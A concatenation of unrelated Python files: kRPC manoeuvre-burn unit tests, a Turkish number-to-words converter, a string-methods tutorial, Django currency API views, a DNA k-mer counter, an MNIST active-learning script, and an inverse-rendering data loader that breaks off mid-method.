    @patch('sys.stdout', spec=True)
    def test_warp_safely_to_burn(self, mock_stdout, mock_conn):
        """Check that warp_safely_to_burn calls warp_to() only if necessary."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        MARGIN = 10
        Hal9000 = NodeExecutor()
        BURN_UT = Hal9000.burn_ut
        space_center = mock_conn().space_center
        with self.subTest('node already past'):
            space_center.ut = BURN_UT
            Hal9000.warp_safely_to_burn(margin=MARGIN)
            space_center.warp_to.assert_not_called()
            mock_stdout.write.assert_not_called()
        with self.subTest('node is now'):
            space_center.ut = BURN_UT - MARGIN
            Hal9000.warp_safely_to_burn(margin=MARGIN)
            space_center.warp_to.assert_not_called()
            mock_stdout.write.assert_not_called()
        with self.subTest('node still in future'):
            space_center.ut = BURN_UT - MARGIN - 1
            Hal9000.warp_safely_to_burn(margin=MARGIN)
            space_center.warp_to.assert_called_with(BURN_UT - MARGIN)
            T0 = self.NODE0.ut - BURN_UT + MARGIN
            STDOUT_CALLS = [call(f'Warping to T0-{T0:.0f} seconds')]
            mock_stdout.write.assert_has_calls(STDOUT_CALLS)
    def test_wait_until_ut(self, mock_conn):
        """Should not call time.sleep if ut already past."""
        Hal9000 = NodeExecutor()
        with patch('NodeExecutor.time', spec=True) as mock_time:
            mock_conn().space_center.ut = 100
            Hal9000.wait_until_ut(ut_threshold=10)
            mock_time.sleep.assert_not_called()
        # StopIteration breaks out of the otherwise-infinite wait loop,
        # proving sleep() was reached.
        with patch('time.sleep', spec=True, side_effect=StopIteration):
            mock_conn().space_center.ut = 10
            called = False
            try:
                Hal9000.wait_until_ut(ut_threshold=100)
            except StopIteration:
                called = True
            self.assertTrue(called)
    def test_burn_baby_burn(self, mock_conn):
        """Check it sets up, executes, and cleans up the burn loop."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        Hal9000 = NodeExecutor()
        dV_left = self.NODE0.delta_v
        remaining_delta_v = self.NODE0.remaining_delta_v
        mock_conn().stream().__enter__().return_value = dV_left
        # Patch out every collaborator so only orchestration is tested.
        with patch.object(NodeExecutor, '_print_burn_event'):
            with patch.object(NodeExecutor, '_burn_loop'):
                with patch.object(NodeExecutor, '_print_burn_error'):
                    with patch.object(NodeExecutor, '_cleanup'):
                        Hal9000.burn_baby_burn()
        Hal9000._cleanup.assert_called_once_with()
        Hal9000._print_burn_error.assert_called_once_with(
            remaining_delta_v)
        Hal9000._burn_loop.assert_called_once_with()
        calls = [call('Ignition'), call('MECO')]
        Hal9000._print_burn_event.assert_has_calls(calls)
    def test_execute_node(self, mock_conn):
        """Should gradually approach node, and call burn_baby_burn()."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        Hal9000 = NodeExecutor()
        with patch.object(NodeExecutor, 'burn_baby_burn'):
            with patch.object(NodeExecutor, 'wait_until_ut'):
                with patch.object(NodeExecutor, 'warp_safely_to_burn'):
                    with patch.object(NodeExecutor, 'align_to_burn'):
                        Hal9000.execute_node()
        calls = [call(), call()]
        Hal9000.align_to_burn.assert_has_calls(calls)
        # Coarse warp first (3 min out), then a fine warp (5 s out).
        calls = [call(margin=180), call(margin=5)]
        Hal9000.warp_safely_to_burn.assert_has_calls(calls)
        Hal9000.wait_until_ut.assert_called_once_with(Hal9000.burn_ut)
        Hal9000.burn_baby_burn.assert_called_once_with()
@patch('krpc.connect', spec=True)
class Test_NodeExecutor_private_methods(unittest.TestCase):
    """
    Test the NodeExecutor class private methods.
    Requires a patch on the KRPC server connection for:
        - active vessel
    """
    def setUp(self):
        """Set up the mock objects."""
        node = namedtuple('node', 'delta_v ut reference_frame')
        self.NODE0 = node(delta_v=10, ut=2000, reference_frame='RF')
        self.CONN_ATTRS = {
            'space_center.active_vessel.control.nodes': (self.NODE0,),
            'space_center.active_vessel.available_thrust': 100,
            'space_center.active_vessel.specific_impulse': 200,
            'space_center.active_vessel.mass': 30,
            'space_center.ut': 1980}
    def tearDown(self):
        """Delete the mock objects."""
        del(self.NODE0)
        del(self.CONN_ATTRS)
    def test__clamp(self, mock_conn):
        """Should clamp the value between ceiling and floor."""
        Hal9000 = NodeExecutor()
        # Each row: (value, floor, ceiling, expected result).
        values = [[-1, 0, 2, 0], [1, 2, 0, 1],
                  [0, -1, 1, 0], [-1, -3, -2, -2], ]
        for value, floor, ceiling, result in values:
            self.assertEqual(Hal9000._clamp(value, floor, ceiling), result)
    def test__throttle_manager(self, mock_conn):
        """Should decrease throttle linearly towards end of burn."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        Hal9000 = NodeExecutor()
        control = mock_conn().space_center.active_vessel.control
        # Each row: (fraction of delta-v left, expected throttle fraction).
        values = [[1, 1], [0.1, 1], [0.05, 0.5],
                  [0.005, 0.05], [0.001, 0.05], ]
        for value, result in values:
            Hal9000._throttle_manager(self.NODE0.delta_v * value)
            self.assertAlmostEqual(
                control.throttle, result * Hal9000.maximum_throttle)
    @patch('NodeExecutor.time', spec=True)
    @patch('sys.stdout', spec=True)
    def test__auto_stage(self, mock_stdout, mock_time, mock_conn):
        """Should autostage if thrust drops 10% or more."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        Hal9000 = NodeExecutor()
        vessel = mock_conn().space_center.active_vessel
        control = vessel.control
        # Each row: (new thrust, expected max throttle,
        #            expected burn duration, staging expected?).
        VALUES = [[95, 0.79, 3.1, False],
                  [89, 0.84, 3.4, True],
                  [50, 1.00, 6.0, True],
                  [25, 1.00, 12.0, True], ]
        for new_thrust, throttle, burn_duration, calls_made in VALUES:
            with self.subTest(f'thrust_ratio: {new_thrust}%'):
                # Fresh mock state for every scenario.
                mock_conn().reset_mock()
                mock_stdout.reset_mock()
                mock_time.reset_mock()
                vessel.available_thrust = new_thrust
                self.assertEqual(Hal9000._auto_stage(100), new_thrust)
                self.assertAlmostEqual(Hal9000.maximum_throttle, throttle, 2)
                self.assertAlmostEqual(
                    Hal9000.burn_duration_at_max_thrust, burn_duration, 1)
                if calls_made:
                    control.activate_next_stage.assert_called_once_with()
                    mock_stdout.write.assert_has_calls(
                        [call(f'Staged at T0-20 seconds')])
                    mock_time.sleep.assert_has_calls([call(0.1), call(0.1)])
                else:
                    mock_stdout.write.assert_not_called()
                    mock_time.sleep.assert_not_called()
    def test__cleanup(self, mock_conn):
        """Should call disengage() on autopilot & remove() on node."""
        Hal9000 = NodeExecutor()
        vessel = mock_conn().space_center.active_vessel
        vessel.auto_pilot.disengage.assert_not_called()
        vessel.control.nodes[0].remove.assert_not_called()
        Hal9000._cleanup()
        vessel.auto_pilot.disengage.assert_called_once_with()
        vessel.control.nodes[0].remove.assert_called_once_with()
    def test__is_burn_complete(self, mock_conn):
        """Check returns True when it's time to shut down the engines."""
        Hal9000 = NodeExecutor()
        self.assertFalse(Hal9000._is_burn_complete(error=10))
        self.assertTrue(Hal9000._is_burn_complete(error=30))
    def test__print_burn_event(self, mock_conn):
        """Should print to stdout with the time to T0 appended."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        TEST_MSG = 'Test event happened'
        STDOUT_CALLS = [call(f'Test event happened at T0-20 seconds')]
        Hal9000 = NodeExecutor()
        with patch('sys.stdout', spec=True) as mock_stdout:
            Hal9000._print_burn_event(TEST_MSG)
            mock_stdout.write.assert_has_calls(STDOUT_CALLS)
    def test__burn_loop(self, mock_conn):
        """Should manage throttle during burn, with staging."""
        def _false_once_then_true():
            # Generator side-effect: lets the loop body run exactly once.
            yield False
            while True:
                yield True
        mock_conn().configure_mock(**self.CONN_ATTRS)
        Hal9000 = NodeExecutor()
        dV_left = 100
        mock_conn().space_center.active_vessel.auto_pilot.error = 0
        mock_conn().stream().__enter__().return_value = dV_left
        with patch.object(NodeExecutor, '_is_burn_complete',
                          side_effect=_false_once_then_true(),), \
                patch.object(NodeExecutor, '_throttle_manager'), \
                patch.object(NodeExecutor, '_auto_stage'), \
                patch.object(NodeExecutor, '_wait_to_go_around_again'):
            Hal9000._burn_loop()
        Hal9000._wait_to_go_around_again.assert_called_once_with()
        Hal9000._auto_stage.assert_called_once_with(Hal9000.thrust)
        Hal9000._throttle_manager.assert_called_once_with(dV_left)
        Hal9000._is_burn_complete.assert_has_calls(
            [call(dV_left), call(dV_left)])
    def test__print_burn_error(self, mock_conn):
        """Check that the remaining deltaV is printed to stdout."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        Hal9000 = NodeExecutor()
        dV_left = 0.1
        STDOUT_CALLS = [
            call(f'{(dV_left/Hal9000.delta_v):2.2f}% of original dV left.')]
        with patch('sys.stdout', spec=True) as mock_stdout:
            Hal9000._print_burn_error(dV_left)
            mock_stdout.write.assert_has_calls(STDOUT_CALLS)
    def test__wait_to_go_around_again(self, mock_conn):
        """Check it calls time.sleep() for 10 ms."""
        Hal9000 = NodeExecutor()
        with patch('NodeExecutor.time', spec=True) as mock_time:
            Hal9000._wait_to_go_around_again()
            mock_time.sleep.assert_called_once_with(0.01)
    def test___str__(self, mock_conn):
        """Check that the __str__() method works."""
        mock_conn().configure_mock(**self.CONN_ATTRS)
        actual_str = str(NodeExecutor(minimum_burn_duration=10))
        expect_str = 'Will burn for 10.0 m/s starting in 15.0 seconds.\n'
        self.assertEqual(actual_str, expect_str)
    def test___repr__(self, mock_conn):
        """Check that the __repr__() method works."""
        actual_str = repr(NodeExecutor(minimum_burn_duration=10))
        expect_str = 'NodeExecutor(minimum_burn_duration=10)'
        self.assertEqual(actual_str, expect_str)
if __name__ == '__main__':
    # Run the whole test suite when this file is executed directly.
    unittest.main()
|
# coding=utf-8
"""
Copyright 2012 Ali Ok (aliokATapacheDOTorg)
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
class DigitsToNumberConverter(object):
    """Convert Turkish numbers written with digits into words.

    Input uses ',' as the fraction separator and '.' as an optional
    grouping separator, e.g. u'-12,05' -> u'eksi on iki virgül sıfır beş'.

    Fixed for Python 2/3 compatibility: ``str()`` instead of the
    Python-2-only ``unicode()`` (the accepted characters are all ASCII),
    floor division ``//`` wherever an integer result is required (true
    division would produce float dict keys on Python 3), and a raw
    string for the regex pattern (``\\d`` in a plain string is an
    invalid escape on modern Python).
    """

    # Spoken words for the separators and the minus sign.
    COMMA_NAME = u'virgül'
    MINUS_NAME = u'eksi'

    NEGATIVE_SIGN = u'-'
    POSITIVE_SIGN = u'+'
    FRACTION_SEPARATOR = ','
    GROUPING_SEPARATOR = '.'

    TURKISH_NUMBER_PATTERN = r'^[-+]?\d+(,\d)?\d*$'
    TURKISH_NUMBER_REGEX = re.compile(TURKISH_NUMBER_PATTERN)

    MAX_GROUP_BASE = 63
    # 10**66 - 1: the largest value expressible with the names below.
    MAX_NATURAL_NUMBER_SUPPORTED = pow(10, 66) - 1

    ZERO_NAME = u'sıfır'

    NUMERAL_SYMBOL_NAMES = {
        0: u'sıfır',
        1: u'bir',
        2: u'iki',
        3: u'üç',
        4: u'dört',
        5: u'beş',
        6: u'altı',
        7: u'yedi',
        8: u'sekiz',
        9: u'dokuz',
    }

    TENS_MULTIPLES_NAMES = {
        1: u'on',
        2: u'yirmi',
        3: u'otuz',
        4: u'kırk',
        5: u'elli',
        6: u'altmış',
        7: u'yetmiş',
        8: u'seksen',
        9: u'doksan',
    }

    HUNDRED_NAME = u'yüz'
    THOUSAND_NAME = u'bin'

    # Name of the n-th power of 1000.
    THOUSAND_POWER_NAMES = {
        0: "",
        1: u'bin',
        2: u'milyon',
        3: u'milyar',
        4: u'trilyon',
        5: u'katrilyon',
        6: u'kentilyon',
        7: u'seksilyon',
        8: u'septilyon',
        9: u'oktilyon',
        10: u'nonilyon',
        11: u'desilyon',
        12: u'undesilyon',
        13: u'dodesilyon',
        14: u'tredesilyon',
        15: u'katordesilyon',
        16: u'kendesilyon',
        17: u'seksdesilyon',
        18: u'septendesilyon',
        19: u'oktodesilyon',
        20: u'novemdesilyon',
        21: u'vigintilyon'
    }

    @classmethod
    def _add_text_for_leading_zeros(cls, integer_str, word):
        """Prefix one ZERO_NAME per leading zero digit of integer_str
        (int() drops leading zeros, so they must be re-spoken)."""
        number_of_leading_zeros = cls._get_number_of_leading_zeros(integer_str)
        for _ in range(0, number_of_leading_zeros):
            word = cls.ZERO_NAME + u' ' + word
        return word

    @classmethod
    def convert_digits_to_words(cls, digits):
        """
        Converts a number in digits to string representation.

        >>> convert_digits_to_words('1234,0245123')
        u'bin iki yüz otuz dört virgül sıfır iki yüz kırk beş bin yüz yirmi üç'
        >>> convert_digits_to_words('-1.234,0245123')
        u'eksi bin iki yüz otuz dört virgül sıfır iki yüz kırk beş bin yüz yirmi üç'

        @type digits: str or unicode
        @rtype: unicode
        @raise: Exception if P{digits} is not a valid Turkish number
        """
        if not digits:
            return None

        # Coerce to text; accepted characters are all ASCII, so str()
        # is safe on both Python 2 and 3.
        digits = str(digits)
        # Grouping dots are purely cosmetic.
        digits = digits.replace(cls.GROUPING_SEPARATOR, '')
        if not cls.TURKISH_NUMBER_REGEX.match(digits):
            raise Exception(u'{} is not a valid number. The allowed pattern is : {}'.format(digits, str(cls.TURKISH_NUMBER_PATTERN)))

        # Split off the fraction part, if present.
        if cls.FRACTION_SEPARATOR in digits:
            integer_str = digits[:digits.find(cls.FRACTION_SEPARATOR)]
            fraction_str = digits[digits.find(cls.FRACTION_SEPARATOR) + 1:]
        else:
            integer_str = digits
            fraction_str = None

        integer_part = int(integer_str)
        fraction_part = int(fraction_str) if fraction_str else 0

        word_integer_part = cls._convert_natural_number_to_words(abs(integer_part))
        word_fraction_part = cls._convert_natural_number_to_words(fraction_part)

        # Re-speak leading zeros that int() swallowed ('05' -> 'sıfır beş').
        word_integer_part = cls._add_text_for_leading_zeros(integer_str, word_integer_part)
        word_fraction_part = cls._add_text_for_leading_zeros(fraction_str, word_fraction_part) if fraction_str else word_fraction_part

        if integer_part < 0:
            word_integer_part = cls.MINUS_NAME + u' ' + word_integer_part

        if cls.FRACTION_SEPARATOR in digits:
            return u'{} {} {}'.format(word_integer_part, cls.COMMA_NAME, word_fraction_part)
        else:
            return word_integer_part

    @classmethod
    def _convert_natural_number_to_words(cls, integer_nr):
        """Spell out a non-negative integer.

        Raises on negative input or values above
        MAX_NATURAL_NUMBER_SUPPORTED.
        """
        if integer_nr < 0:
            raise Exception('Argument is negative : {}'.format(integer_nr))
        if integer_nr > cls.MAX_NATURAL_NUMBER_SUPPORTED:
            raise Exception(
                'Fraction {} of the given number is larger than the maximum supported natural number: {}'.format(integer_nr, cls.MAX_NATURAL_NUMBER_SUPPORTED))

        result = u''
        integer_nr = abs(integer_nr)

        # Numbers below 1000 are handled directly.
        if integer_nr < 10:
            result = cls.NUMERAL_SYMBOL_NAMES[integer_nr]
        elif integer_nr < 100:
            # Floor division: '/' would yield a float dict key on Python 3.
            tens_digit = integer_nr // 10
            ones_digit = integer_nr % 10
            result = u'{} {}'.format(cls.TENS_MULTIPLES_NAMES[tens_digit], cls._convert_natural_number_to_words(ones_digit) if ones_digit > 0 else u'')
        elif integer_nr < 1000:
            hundreds_digit = integer_nr // 100
            rest = integer_nr % 100
            rest_str = cls._convert_natural_number_to_words(rest) if rest > 0 else u''
            if hundreds_digit == 0:
                result = rest_str
            elif hundreds_digit == 1:
                # Turkish says 'yüz', never 'bir yüz'.
                result = u'{} {}'.format(cls.HUNDRED_NAME, rest_str)
            else:
                result = u'{} {} {}'.format(cls._convert_natural_number_to_words(hundreds_digit), cls.HUNDRED_NAME, rest_str)
        else:
            # Walk the 3-digit groups from most significant downwards.
            most_significant_group_base = cls._find_most_significant_group_base(integer_nr)
            for i in range(most_significant_group_base // 3, 0, -1):
                group_nr = cls._get_nth_group_nr(integer_nr, i)
                if group_nr == 0:  # don't write 'sifir milyon'
                    pass
                elif group_nr == 1 and i == 1:  # don't write 'bir bin', but write 'bir milyon' (below)
                    result += u' {}'.format(cls.THOUSAND_NAME)
                else:
                    group_nr_str = cls._convert_natural_number_to_words(group_nr)
                    result += u' {} {} '.format(group_nr_str, cls.THOUSAND_POWER_NAMES[i])
            result = result.strip()
            last_group_nr = integer_nr % 1000
            if last_group_nr > 0:
                result += u' ' + cls._convert_natural_number_to_words(last_group_nr)

        return result.strip()

    @classmethod
    def _find_most_significant_group_base(cls, integer_nr):
        """Return 3*k where 1000**k is the largest power of 1000 not
        exceeding integer_nr."""
        i = cls.MAX_GROUP_BASE // 3
        while pow(10, i * 3) > integer_nr:
            i -= 1
        return i * 3

    @classmethod
    def _get_nth_group_nr(cls, integer_nr, n):
        """Return the n-th 3-digit group (0-999), counted from the
        right, with n=0 being the least significant group."""
        integer_nr //= pow(1000, n)
        integer_nr %= 1000
        return integer_nr

    @classmethod
    def _get_number_of_leading_zeros(cls, integer_str):
        """Count leading zero digits of integer_str, ignoring a sign."""
        if integer_str.startswith(cls.NEGATIVE_SIGN) or integer_str.startswith(cls.POSITIVE_SIGN):
            integer_str = integer_str[1:]
        integer_str_wo_leading_zeros = str(int(integer_str))
        return len(integer_str) - len(integer_str_wo_leading_zeros)
# Tutorial script demonstrating Python string operations.
# Strings are immutable
# The variables which are assigned to a string are actually
# object references and not the objects themselves
# Concatenation in strings
str1 = "New "+"York "+"city"
print(str1)
# Augmented assignment operator (each += rebinds str1 to a new string)
str1= "New "
str1+= "York "
str1+= "City"
print(str1)
"""
# Use of join() method
1. Concatenation with + results in temporaries
2. str.join() inserts a seperator between collection of strings
3. Call join on seperator string
"""
# Joining the strings
colors =";".join(["Red","Yellow","Green","Blue"])
print(colors)
# Splitting the strings
print(colors.split(";"))
# Empty string separator: plain concatenation via join
str1= "".join(["Programming ","Language"])
print(str1)
# Partitioning: it splits the word in three parts: the part before the
# separator, the separator itself, and the part after it.
# It returns a tuple
str2= "Unbelievable"
print(str2.partition('bel'))
# String formatting with positional arguments
str3 = "I have {} computers for work and {} of them is apple macbook."
print(str3.format("three","one"))
# Keyword arguments in formatting
str4 = "Today' temperature is {deg} and {fh}"
print(str4.format(deg="30 degree celsius",fh="86 fahrenheit"))
val =22
str5= "My age is {} years."
print(str5.format(val))
# Literal string interpolation (f-strings), from python 3.6 and later.
# They are used to embed expressions inside literal strings, using a
# minimal syntax: any python expression can be added into the curly
# braces; it is evaluated and inserted at runtime.
str6 = f"He drives {3*1} times a day"
print(str6)
import datetime
time1=f"The current time is {datetime.datetime.now().isoformat()}."
print(time1)
import math
math1= f"Math constants pi: {math.pi},e: {math.e}."
print(math1)
import json
from django.http import JsonResponse
from rest_framework import generics
from currency.models import Rate
from .serializers import RateSerializer
def hello_world(request):
    """Trivial endpoint returning a static JSON payload (smoke test)."""
    payload = {'hello': 'world'}
    return JsonResponse(payload)
# http://localhost:8000/api/v1/currency/rates/
class RatesView(generics.ListCreateAPIView):
    """List all Rate records (GET) or create a new one (POST)."""
    queryset = Rate.objects.all()
    serializer_class = RateSerializer
class RateView(generics.RetrieveUpdateDestroyAPIView):
    """Retrieve, update or delete a single Rate record (selected by the
    URL-captured lookup — DRF's default is the primary key)."""
    queryset = Rate.objects.all()
    serializer_class = RateSerializer
|
def convert(substr):
    """Map a DNA string over {A, C, G, T} to its base-4 integer value."""
    digit_for = {"A": "0", "C": "1", "G": "2", "T": "3"}
    base4_digits = "".join(digit_for[base] for base in substr)
    return int(base4_digits, 4)
if __name__ == "__main__":
    # Count every k-mer of the input text by its base-4 index.
    # input() already returns str, so the original str() wrapper was
    # redundant and has been dropped.
    text = input()
    k = int(input())
    acid_dna = [0] * (4 ** k)
    for i in range(len(text) - k + 1):
        # Encode each window once (the original called convert() twice
        # per iteration, doubling the work).
        idx = convert(text[i:i + k])
        acid_dna[idx] += 1
    print(*acid_dna, sep=' ')
|
import argparse
import copy
import os, sys
import numpy as np
from sklearn.model_selection import train_test_split
import tensorflow as tf
import tensorflow.keras as keras
from tensorflow.keras.preprocessing.image import ImageDataGenerator
BASE_PATH = os.path.dirname(os.path.realpath(__file__))
MODULES_PATH = os.path.join(BASE_PATH, "..")
sys.path.append(MODULES_PATH)
TF_AL_PATH = os.path.join(BASE_PATH, "..", "..", "tf_al")
sys.path.append(TF_AL_PATH)
TF_MP_PATH = os.path.join(BASE_PATH, "..", "..", "tf_al_mp")
sys.path.append(TF_MP_PATH)
from tf_al import Config, Dataset, ExperimentSuitMetrics, ExperimentSuit, AcquisitionFunction
from tf_al.wrapper import McDropout
from tf_al.utils import gen_seeds
from tf_al_mp.wrapper import MomentPropagation
from models import fchollet_cnn, setup_growth, disable_tf_logs
from utils import setup_logger
# NOTE(review): this rebinding shadows the BASE_PATH defined above for
# sys.path setup — confirm it is intentional.
BASE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "..")

# Pool/Dataset parameters
val_set_size = 100
test_set_size = 10_000
initial_pool_size = 20

# Split data into (x, 10K, 100) = (train/test/valid)
(x_train, y_train), (x_test, y_test) = keras.datasets.mnist.load_data()

# Concat and normalize data: featurewise statistics are computed over
# the union of train and test before re-splitting below.
x_stack = np.expand_dims(np.vstack([x_train, x_test]), axis=-1).astype(np.float32)
datagen = ImageDataGenerator(featurewise_center=True, featurewise_std_normalization=True)
datagen.fit(x_stack)
inputs = datagen.standardize(x_stack)
targets = np.hstack([y_train, y_test])
x_train, x_test, y_train, y_test = train_test_split(inputs, targets, test_size=test_set_size)
x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=val_set_size)

disable_tf_logs()
setup_growth()

# seeds = gen_seeds(10)
# seeds = []
# Fixed seed list for reproducibility; only the first entry is used below.
seeds = [20432, 10942, 83152, 59138, 49976, 10109, 74983, 66781, 93135]
print("Initial seeds {}".format(seeds))
first_seed = seeds[0]
np.random.seed(first_seed)
tf.random.set_seed(first_seed)

# Model / training hyper-parameters.
num_classes = len(np.unique(targets))
optimizer = "adam"
loss = "sparse_categorical_crossentropy"
metrics = [keras.metrics.SparseCategoricalAccuracy()]
step_size = 1
batch_size = 10
verbose = False
sample_size = 25
fit_params = {"epochs": 200, "batch_size": batch_size}
base_model = fchollet_cnn(output=num_classes)

mc_config = Config(
    fit=fit_params,
    query={"sample_size": sample_size},
    eval={"batch_size": 900, "sample_size": sample_size}
)
# Evaluate the (untrained) MC-dropout wrapper on the test split.
mc_model = McDropout(base_model, config=mc_config)
mc_model.compile(optimizer=optimizer, loss=loss, metrics=metrics)
print(mc_model.evaluate(x_test, y_test, batch_size=900))

# first_seed = seeds[1]
# np.random.seed(first_seed)
# tf.random.set_seed(first_seed)
# keras.backend.clear_session()
# model = keras.models.clone_model(base_model)
# model.compile(optimizer=optimizer, loss=loss, metrics=metrics)

# Re-seed identically and evaluate a shallow copy of the wrapper.
# NOTE(review): this appears to check whether copy.copy disturbs the
# model's evaluation — confirm the intent.
first_seed = seeds[0]
np.random.seed(first_seed)
tf.random.set_seed(first_seed)
o_model = copy.copy(mc_model)
print(o_model.evaluate(x_test, y_test, batch_size=900))
import glob
import numpy as np
import os.path as osp
from PIL import Image
import random
import struct
from torch.utils.data import Dataset
import scipy.ndimage as ndimage
import cv2
from skimage.measure import block_reduce
import h5py
import scipy.ndimage as ndimage
class BatchLoader(Dataset):
    """Dataset of rendered indoor scenes for inverse rendering.

    Each item bundles an HDR image with its per-pixel ground truth
    (albedo, normal, roughness, depth), segmentation masks and —
    optionally — per-pixel environment maps and the previous cascade
    level's predictions loaded from .h5 files.
    """

    def __init__(self, dataRoot, dirs = ['main_xml', 'main_xml1',
            'mainDiffLight_xml', 'mainDiffLight_xml1',
            'mainDiffMat_xml', 'mainDiffMat_xml1'],
            imHeight = 240, imWidth = 320,
            phase='TRAIN', rseed = None, cascadeLevel = 0,
            isLight = False, isAllLight = False,
            envHeight = 8, envWidth = 16, envRow = 120, envCol = 160,
            SGNum = 12 ):
        # NOTE: the mutable default 'dirs' is never mutated, so sharing
        # the list across calls is harmless.
        # Scene list file for the requested split.
        if phase.upper() == 'TRAIN':
            self.sceneFile = osp.join(dataRoot, 'train.txt')
        elif phase.upper() == 'TEST':
            self.sceneFile = osp.join(dataRoot, 'test.txt')
        else:
            print('Unrecognized phase for data loader')
            assert(False )

        with open(self.sceneFile, 'r') as fIn:
            sceneList = fIn.readlines()
        sceneList = [x.strip() for x in sceneList]

        self.imHeight = imHeight
        self.imWidth = imWidth
        self.phase = phase.upper()
        self.cascadeLevel = cascadeLevel
        self.isLight = isLight
        self.isAllLight = isAllLight
        # Per-pixel environment map resolution (envHeight x envWidth)
        # on a spatial grid of envRow x envCol.  (The original assigned
        # envWidth/envHeight twice; the duplicates are removed.)
        self.envWidth = envWidth
        self.envHeight = envHeight
        self.envRow = envRow
        self.envCol = envCol
        self.SGNum = SGNum

        # Each scene exists once per material/lighting variant dir.
        shapeList = []
        for d in dirs:
            shapeList = shapeList + [osp.join(dataRoot, d, x) for x in sceneList]
        shapeList = sorted(shapeList)
        print('Shape Num: %d' % len(shapeList))

        self.imList = []
        for shape in shapeList:
            imNames = sorted(glob.glob(osp.join(shape, 'im_*.hdr')))
            self.imList = self.imList + imNames

        if isAllLight:
            # Keep only frames that have a rendered environment map ...
            self.imList = [x for x in self.imList if
                    osp.isfile(x.replace('im_', 'imenv_'))]
            if cascadeLevel > 0:
                # ... and, beyond cascade 0, a previous-level prediction.
                self.imList = [x for x in self.imList if
                        osp.isfile(x.replace('im_', 'imenv_').replace(
                            '.hdr', '_%d.h5' % (self.cascadeLevel - 1)))]

        print('Image Num: %d' % len(self.imList))

        # BRDF parameter file lists derived from the image names.
        # Normals and depth are shared across lighting/material
        # variants, hence the 'DiffLight'/'DiffMat' stripping.
        self.albedoList = [x.replace('im_', 'imbaseColor_').replace('hdr', 'png') for x in self.imList]
        self.normalList = [x.replace('im_', 'imnormal_').replace('hdr', 'png') for x in self.imList]
        self.normalList = [x.replace('DiffLight', '') for x in self.normalList]
        self.roughList = [x.replace('im_', 'imroughness_').replace('hdr', 'png') for x in self.imList]
        self.depthList = [x.replace('im_', 'imdepth_').replace('hdr', 'dat') for x in self.imList]
        self.depthList = [x.replace('DiffLight', '') for x in self.depthList]
        self.depthList = [x.replace('DiffMat', '') for x in self.depthList]
        self.segList = [x.replace('im_', 'immask_').replace('hdr', 'png') for x in self.imList]
        self.segList = [x.replace('DiffMat', '') for x in self.segList]

        if self.cascadeLevel == 0:
            if self.isLight:
                self.envList = [x.replace('im_', 'imenv_') for x in self.imList]
        else:
            if self.isLight:
                self.envList = [x.replace('im_', 'imenv_') for x in self.imList]
                self.envPreList = [x.replace('im_', 'imenv_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1)) for x in self.imList]
            # Previous cascade level's predictions.
            self.albedoPreList = [x.replace('im_', 'imbaseColor_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1)) for x in self.imList]
            self.normalPreList = [x.replace('im_', 'imnormal_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1)) for x in self.imList]
            self.roughPreList = [x.replace('im_', 'imroughness_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1)) for x in self.imList]
            self.depthPreList = [x.replace('im_', 'imdepth_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1)) for x in self.imList]
            self.diffusePreList = [x.replace('im_', 'imdiffuse_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1)) for x in self.imList]
            self.specularPreList = [x.replace('im_', 'imspecular_').replace('.hdr', '_%d.h5' % (self.cascadeLevel - 1)) for x in self.imList]

        # Permute the image list.
        self.count = len(self.albedoList)
        self.perm = list(range(self.count))
        if rseed is not None:
            # Bug fix: honour the caller-supplied seed.  The original
            # called random.seed(0), silently ignoring rseed.
            random.seed(rseed)
        random.shuffle(self.perm)

    def __len__(self):
        return len(self.perm)

    def __getitem__(self, ind):
        """Load and return one sample as a dict of float32 arrays."""
        # Read segmentation; seg is in {0, 0.5, 1} after remapping.
        seg = 0.5 * (self.loadImage(self.segList[self.perm[ind] ] ) + 1)[0:1, :, :]
        segArea = np.logical_and(seg > 0.49, seg < 0.51 ).astype(np.float32 )
        segEnv = (seg < 0.1).astype(np.float32 )
        segObj = (seg > 0.9)

        if self.isLight:
            # Erode the object mask so lighting losses avoid boundaries.
            segObj = segObj.squeeze()
            segObj = ndimage.binary_erosion(segObj, structure=np.ones((7, 7) ),
                    border_value=1)
            segObj = segObj[np.newaxis, :, :]

        segObj = segObj.astype(np.float32 )

        # Read Image
        im = self.loadHdr(self.imList[self.perm[ind] ] )
        # Random scale the image
        im, scale = self.scaleHdr(im, seg)

        # Read albedo (sRGB png -> linear via gamma 2.2)
        albedo = self.loadImage(self.albedoList[self.perm[ind] ], isGama = False)
        albedo = (0.5 * (albedo + 1) ) ** 2.2

        # normalize the normal vector so that it will be unit length
        normal = self.loadImage(self.normalList[self.perm[ind] ] )
        normal = normal / np.sqrt(np.maximum(np.sum(normal * normal, axis=0), 1e-5) )[np.newaxis, :]

        # Read roughness
        rough = self.loadImage(self.roughList[self.perm[ind] ] )[0:1, :, :]

        # Read depth
        depth = self.loadBinary(self.depthList[self.perm[ind] ])

        if self.isLight:
            envmaps, envmapsInd = self.loadEnvmap(self.envList[self.perm[ind] ] )
            # Keep the envmap consistent with the rescaled image.
            envmaps = envmaps * scale
            if self.cascadeLevel > 0:
                envmapsPre = self.loadH5(self.envPreList[self.perm[ind] ] )
                if envmapsPre is None:
                    # Fall back to a zero prediction and mark it invalid.
                    print("Wrong envmap pred")
                    envmapsInd = envmapsInd * 0
                    envmapsPre = np.zeros((84, 120, 160), dtype=np.float32 )

        if self.cascadeLevel > 0:
            # Previous-level predictions, normalized into rough [0, 1]
